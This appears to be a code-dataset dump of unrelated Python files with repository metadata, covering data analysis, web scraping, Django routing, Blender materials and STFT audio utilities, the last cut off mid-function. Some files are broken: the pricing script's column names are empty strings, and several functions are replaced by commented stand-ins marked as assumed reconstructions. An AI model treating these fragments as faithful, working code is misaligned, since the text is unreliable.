data = pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'], ascending=True, inplace=True)
or_data = pd.read_excel('CF66-ordinary.xlsx')
rule = pd.read_excel('6. Existing pricing strategy.xlsx')
or_name = or_data['WBL_NUM'].unique()
data['ordinary'] = 0
for i in range(len(data)):
    if data.iloc[i, 2] in or_name:
        data.iloc[i, 9] = 1
data['volume'] = data['CNTR_TYPE']
for i in range(len(data)):
    data.iloc[i, 10] = int(data.iloc[i, 10][0:2])
raw_data = data.groupby('SVVD')
data_to_list = list(raw_data)
raw_list = []
for i in data_to_list:
    raw_list.append(i[1])
total_volume = raw_data['volume'].sum() * 1.2
# NOTE: several non-ASCII column names were reduced to '' in this dump,
# which is why the groupby keys and rule lookups below are empty strings.
thisrule = rule.groupby(['', '']).get_group(('', ''))
group_rule = thisrule.groupby(['', ''])
rule_to_list = list(group_rule)
day_list = []
rule_list = []
for i in rule_to_list:
    day_list.append(i[0])
    rule_list.append(i[1])
m = datetime.timedelta(days=14)
newlist = []
for i in raw_list:
    i['WBL_AUD_DT'] = pd.to_datetime(i['WBL_AUD_DT'])
    m = datetime.timedelta(days=14)
    j = i[i['WBL_AUD_DT'] >= i['WBL_AUD_DT'].max() - m]
    newlist.append(j)
del(raw_list)
for i in newlist:
    i['acc_volume'] = i['volume'].cumsum()
    i['total_volume'] = i['volume'].sum() * 1.2
    m = datetime.timedelta(days=14)
    i['day'] = (i['WBL_AUD_DT'] - i['WBL_AUD_DT'].max() + m).dt.days
    i['acc_rate'] = i['acc_volume'] / i['total_volume'] * 100
    i['new_AMT'] = i['AMT']
for k in range(len(newlist)):
    acc_20gp = 0
    acc_40gp = 0
    acc_40hq = 0
    print('k=' + str(k))
    for i in range(len(day_list)):
        print('i=' + str(i))
        first_day = day_list[i][0]
        last_day = day_list[i][1]
        flag = [0] * len(rule_list[i])
        for j in range(len(newlist[k])):
            if newlist[k].iloc[j]['day'] >= first_day and newlist[k].iloc[j]['day'] < last_day and newlist[k].iloc[j]['ordinary'] == 1:
                for z in range(len(rule_list[i])):
                    print('z=' + str(z))
                    if newlist[k].iloc[j]['acc_rate'] > rule_list[i].iloc[z][''] and rule_list[i].iloc[z]['/'] == '':
                        if flag[z] == 0:
                            flag[z] = 1
                            acc_20gp += rule_list[i].iloc[z]['20GP']
                            acc_40gp += rule_list[i].iloc[z]['40GP']
                            acc_40hq += rule_list[i].iloc[z]['40HQ']
                    if newlist[k].iloc[j]['acc_rate'] < rule_list[i].iloc[z][''] and rule_list[i].iloc[z]['/'] == '':
                        if flag[z] == 0:
                            flag[z] = 1
                            acc_20gp -= rule_list[i].iloc[z]['20GP']
                            acc_40gp -= rule_list[i].iloc[z]['40GP']
                            acc_40hq -= rule_list[i].iloc[z]['40HQ']
                    print(flag)
                    print(acc_20gp)
                    print(acc_40gp)
                    print(acc_40hq)
                if newlist[k].iloc[j]['CNTR_TYPE'] == '20GP':
                    newlist[k].iloc[j, 15] += acc_20gp
                if newlist[k].iloc[j]['CNTR_TYPE'] == '40GP':
                    newlist[k].iloc[j, 15] += acc_40gp
                if newlist[k].iloc[j]['CNTR_TYPE'] == '40HQ':
                    newlist[k].iloc[j, 15] += acc_40hq
for i in newlist:
    print('revenue:' + str(i['AMT'].sum()))
    print('newrevenue:' + str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
avg_line_length: 27.118644 | max_line_length: 121 | alphanum_fraction: 0.62375

hexsha: 4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940 | size: 776 | ext: py | lang: Python
max_stars_repo: tests/test_selection.py @ qrebjock/fanok (5c3b95ca5f2ec90af7060c21409a11130bd350bd) | licenses: ["MIT"] | stars: null
max_issues_repo: tests/test_selection.py @ qrebjock/fanok (5c3b95ca5f2ec90af7060c21409a11130bd350bd) | licenses: ["MIT"] | issues: null
max_forks_repo: tests/test_selection.py @ qrebjock/fanok (5c3b95ca5f2ec90af7060c21409a11130bd350bd) | licenses: ["MIT"] | forks: 1 (2020-08-26T12:20:26.000Z to 2020-08-26T12:20:26.000Z)
import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
avg_line_length: 27.714286 | max_line_length: 79 | alphanum_fraction: 0.474227

hexsha: 4c49699fa44232922a69a87e2fa00808e22b315a | size: 7,256 | ext: py | lang: Python
max_stars_repo: unitcap/unit_cap.py @ fintelia/habitationi (7dd15ecbab0ad63a70505920766de9c27294fb6e) | licenses: ["Apache-2.0"] | stars: 1 (2021-10-03T14:44:38.000Z to 2021-10-03T14:44:38.000Z)
max_issues_repo: unitcap/unit_cap.py @ fintelia/habitationi (7dd15ecbab0ad63a70505920766de9c27294fb6e) | licenses: ["Apache-2.0"] | issues: null
max_forks_repo: unitcap/unit_cap.py @ fintelia/habitationi (7dd15ecbab0ad63a70505920766de9c27294fb6e) | licenses: ["Apache-2.0"] | forks: 1 (2021-02-20T23:22:10.000Z to 2021-02-20T23:22:10.000Z)
#!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
PORT_NUMBER = 8080
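# The request handler and run() were stripped from this dump; a minimal
# Python 2 stand-in so the entry point below has something to call
# (the handler behaviour is an assumption, not the original):
class StubHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write('OK')

def run():
    server = HTTPServer(('', PORT_NUMBER), StubHandler)
    server.serve_forever()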
if __name__ == "__main__":
    print run()
avg_line_length: 32.106195 | max_line_length: 108 | alphanum_fraction: 0.553335

hexsha: 4c4972e50ba94dc3591b0fc9fac43e37a601a455 | size: 25 | ext: py | lang: Python
max_stars_repo: matrix/__init__.py @ AbhiK002/Matrix (2d83f08877dccba9e4c710bd5fb65f613848d63f) | licenses: ["MIT"] | stars: 2 (2022-02-11T04:39:21.000Z to 2022-02-12T15:50:35.000Z)
max_issues_repo: matrix/__init__.py @ AbhiK002/Matrix (2d83f08877dccba9e4c710bd5fb65f613848d63f) | licenses: ["MIT"] | issues: null
max_forks_repo: matrix/__init__.py @ AbhiK002/Matrix (2d83f08877dccba9e4c710bd5fb65f613848d63f) | licenses: ["MIT"] | forks: null
from .main import Matrix
avg_line_length: 12.5 | max_line_length: 24 | alphanum_fraction: 0.8

hexsha: 4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e | size: 2,348 | ext: py | lang: Python
max_stars_repo: samples/cmk/test.py @ jasstionzyf/Mask_RCNN (971a9dd9be1f9716e6f7c23b959bd57079cd93eb) | licenses: ["MIT"] | stars: null
max_issues_repo: samples/cmk/test.py @ jasstionzyf/Mask_RCNN (971a9dd9be1f9716e6f7c23b959bd57079cd93eb) | licenses: ["MIT"] | issues: null
max_forks_repo: samples/cmk/test.py @ jasstionzyf/Mask_RCNN (971a9dd9be1f9716e6f7c23b959bd57079cd93eb) | licenses: ["MIT"] | forks: null
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
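# locationToMask was stripped from this dump. A plausible reconstruction
# matching the commented-out call below: one boolean H x W x N mask per
# (y1, x1, y2, x2) box, plus per-instance class ids (all assumed):
def locationToMask(locations, height, width):
    mask = np.zeros((height, width, len(locations)), dtype=bool)
    for i, (y1, x1, y2, x2) in enumerate(locations):
        mask[y1:y2, x1:x2, i] = True
    classIds = np.ones(len(locations), dtype=np.int32)
    return mask, classIds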
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
avg_line_length: 18.488189 | max_line_length: 77 | alphanum_fraction: 0.559199

hexsha: 4c49c1d6c63daaf7fca0ba56abe4608634b5eea3 | size: 371 | ext: py | lang: Python
max_stars_repo: myBeautifulSoup.py @ ZhongXinWang/python (4cf3ecdc9d9e811e777c6d8408a8319097cfdec3) | licenses: ["Apache-2.0"] | stars: null
max_issues_repo: myBeautifulSoup.py @ ZhongXinWang/python (4cf3ecdc9d9e811e777c6d8408a8319097cfdec3) | licenses: ["Apache-2.0"] | issues: null
max_forks_repo: myBeautifulSoup.py @ ZhongXinWang/python (4cf3ecdc9d9e811e777c6d8408a8319097cfdec3) | licenses: ["Apache-2.0"] | forks: null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Winston.Wang
import requests
from bs4 import BeautifulSoup

print(dir(BeautifulSoup))

url = 'http://www.baidu.com'
with requests.get(url) as r:
    r.encoding = 'utf-8'
    # name an explicit parser to avoid bs4's "no parser specified" warning
    soup = BeautifulSoup(r.text, 'html.parser')
    pret = soup.prettify()
    u = soup.select('#u1 a')
    for i in u:
        print("%s: %s" % (i.getText(), i.get('href')))
avg_line_length: 24.733333 | max_line_length: 52 | alphanum_fraction: 0.660377

hexsha: 4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c | size: 869 | ext: py | lang: Python
max_stars_repo: blogsNewsModule/urls.py @ adityakekare/NewsAPIDjango (47ff0c69e3d48c10a257c8221916ccd2fdaf9abb) | licenses: ["MIT"] | stars: 1 (2020-10-14T17:13:45.000Z to 2020-10-14T17:13:45.000Z)
max_issues_repo: blogsNewsModule/urls.py @ adityakekare/NewsAPIDjango (47ff0c69e3d48c10a257c8221916ccd2fdaf9abb) | licenses: ["MIT"] | issues: null
max_forks_repo: blogsNewsModule/urls.py @ adityakekare/NewsAPIDjango (47ff0c69e3d48c10a257c8221916ccd2fdaf9abb) | licenses: ["MIT"] | forks: null
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
]
avg_line_length: 41.380952 | max_line_length: 75 | alphanum_fraction: 0.667434

hexsha: 4c4ab4331dee2d296afdfa6d9310db62fe1c4c93 | size: 3,133 | ext: py | lang: Python
max_stars_repo: unitClass.py @ MatthewZheng/UnitsPlease (5911267b5a0a78dd4d833c6be46e89caaf98c200) | licenses: ["MIT"] | stars: null
max_issues_repo: unitClass.py @ MatthewZheng/UnitsPlease (5911267b5a0a78dd4d833c6be46e89caaf98c200) | licenses: ["MIT"] | issues: null
max_forks_repo: unitClass.py @ MatthewZheng/UnitsPlease (5911267b5a0a78dd4d833c6be46e89caaf98c200) | licenses: ["MIT"] | forks: null
#!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
avg_line_length: 42.917808 | max_line_length: 192 | alphanum_fraction: 0.509416

hexsha: 4c4be3eb705a80e6147920908a86da5673e90f59 | size: 918 | ext: py | lang: Python
max_stars_repo: week4/string_format.py @ MathAdventurer/Data_Mining (b0a06b5f7c13a3762a07eb84518aa4ee56896516) | licenses: ["MIT"] | stars: 1 (2021-02-27T18:35:39.000Z to 2021-02-27T18:35:39.000Z)
max_issues_repo: week4/string_format.py @ MathAdventurer/Data_Mining (b0a06b5f7c13a3762a07eb84518aa4ee56896516) | licenses: ["MIT"] | issues: null
max_forks_repo: week4/string_format.py @ MathAdventurer/Data_Mining (b0a06b5f7c13a3762a07eb84518aa4ee56896516) | licenses: ["MIT"] | forks: null
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems"))
avg_line_length: 27 | max_line_length: 80 | alphanum_fraction: 0.623094

hexsha: 4c4da9a43e106d41a3befb2cd7c5b3dab87492dd | size: 274 | ext: py | lang: Python
max_stars_repo: conans/server/server_launcher.py @ Wonders11/conan (28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8) | licenses: ["MIT"] | stars: 6,205 (2015-12-01T13:40:05.000Z to 2022-03-31T07:30:25.000Z)
max_issues_repo: conans/server/server_launcher.py @ Wonders11/conan (28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8) | licenses: ["MIT"] | issues: 8,747 (2015-12-01T16:28:48.000Z to 2022-03-31T23:34:53.000Z)
max_forks_repo: conans/server/server_launcher.py @ Mattlk13/conan (005fc53485557b0a570bb71670f2ca9c66082165) | licenses: ["MIT"] | forks: 961 (2015-12-01T16:56:43.000Z to 2022-03-31T13:50:52.000Z)
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
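# main() was stripped from this dump; in the real launcher it simply starts
# the server (assuming ServerLauncher exposes a launch() method):
def main(*args):
    launcher.launch()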
if __name__ == "__main__":
    main()
avg_line_length: 18.266667 | max_line_length: 66 | alphanum_fraction: 0.762774

hexsha: 4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09 | size: 153,586 | ext: py | lang: Python
max_stars_repo: sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py @ praveenkuttappan/azure-sdk-for-python (4b79413667b7539750a6c7dde15737013a3d4bd5) | licenses: ["MIT"] | stars: 2,728 (2015-01-09T10:19:32.000Z to 2022-03-31T14:50:33.000Z)
max_issues_repo: sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py @ v-xuto/azure-sdk-for-python (9c6296d22094c5ede410bc83749e8df8694ccacc) | licenses: ["MIT"] | issues: 17,773 (2015-01-05T15:57:17.000Z to 2022-03-31T23:50:25.000Z)
max_forks_repo: sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py @ v-xuto/azure-sdk-for-python (9c6296d22094c5ede410bc83749e8df8694ccacc) | licenses: ["MIT"] | forks: 1,916 (2015-01-19T05:05:41.000Z to 2022-03-31T19:36:44.000Z)
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
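# The ~150 KB of generated model classes were stripped from this dump.
# Autogenerated files like this define msrest models in the following
# pattern (a sketch, not one of the real video analyzer models):
class ExampleResource(msrest.serialization.Model):
    """Illustrative shape of an autogenerated model class."""

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ExampleResource, self).__init__(**kwargs)
        self.id = kwargs.get('id', None)
        self.name = kwargs.get('name', None)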
avg_line_length: 38.473447 | max_line_length: 815 | alphanum_fraction: 0.658563

hexsha: 4c4fedd0e6fc912cf1a282846b6e90c655a094c7 | size: 69,123 | ext: py | lang: Python
max_stars_repo: blender/arm/material/cycles.py @ philipmduarte/armory (675211c66a1e49147226ccb472a6f5dc87b7db02) | licenses: ["Zlib"] | stars: 1 (2021-03-17T05:51:45.000Z to 2021-03-17T05:51:45.000Z)
max_issues_repo: blender/arm/material/cycles.py @ philipmduarte/armory (675211c66a1e49147226ccb472a6f5dc87b7db02) | licenses: ["Zlib"] | issues: null
max_forks_repo: blender/arm/material/cycles.py @ philipmduarte/armory (675211c66a1e49147226ccb472a6f5dc87b7db02) | licenses: ["Zlib"] | forks: null
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
avg_line_length: 39.207601 | max_line_length: 185 | alphanum_fraction: 0.567568

hexsha: 4c4ffee559cb6b71ce9c01f453a956254f1cdb8a | size: 9,981 | ext: py | lang: Python
max_stars_repo: src/config.py @ Jizanator/botty (3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e) | licenses: ["MIT"] | stars: null
max_issues_repo: src/config.py @ Jizanator/botty (3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e) | licenses: ["MIT"] | issues: null
max_forks_repo: src/config.py @ Jizanator/botty (3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e) | licenses: ["MIT"] | forks: null
import configparser
import numpy as np
import os
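# The Config class was stripped from this dump; a minimal stand-in showing
# only what the self-test below relies on (the file name and section layout
# are assumptions):
class Config:
    def __init__(self, print_warnings=False):
        parser = configparser.ConfigParser()
        parser.read("config.ini")  # assumed location
        self.print_warnings = print_warnings
        # mapping of item name -> raw config entry
        self.items = dict(parser["items"]) if parser.has_section("items") else {}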
if __name__ == "__main__":
    config = Config(print_warnings=True)
    # Check if any added items miss templates
    for k in config.items:
        if not os.path.exists(f"./assets/items/{k}.png"):
            print(f"Template not found: {k}")
    # Check if any item templates miss a config
    for filename in os.listdir(f'assets/items'):
        filename = filename.lower()
        if filename.endswith('.png'):
            item_name = filename[:-4]
            blacklist_item = item_name.startswith("bl__")
            if item_name not in config.items and not blacklist_item:
                print(f"Config not found for: " + filename)
avg_line_length: 55.45 | max_line_length: 164 | alphanum_fraction: 0.616772

hexsha: 4c50b18cade6c81fd3dffac9c31804d4407603cf | size: 19,446 | ext: py | lang: Python
max_stars_repo: aps/transform/utils.py @ haoxiangsnr/aps (38f77139b54553b0cb04b26a833bebbbf3177c5e) | licenses: ["Apache-2.0"] | stars: 2 (2021-06-17T20:29:02.000Z to 2021-09-18T01:56:36.000Z)
max_issues_repo: aps/transform/utils.py @ haoxiangsnr/aps (38f77139b54553b0cb04b26a833bebbbf3177c5e) | licenses: ["Apache-2.0"] | issues: null
max_forks_repo: aps/transform/utils.py @ haoxiangsnr/aps (38f77139b54553b0cb04b26a833bebbbf3177c5e) | licenses: ["Apache-2.0"] | forks: null
# Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
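def sqrthann(frame_len: int, periodic: bool = True) -> th.Tensor:
    """
    Square-root Hann window. (The original definition was stripped from
    this dump; this is the standard form that the window table in
    init_window below expects.)
    """
    return th.hann_window(frame_len, periodic=periodic)**0.5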
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
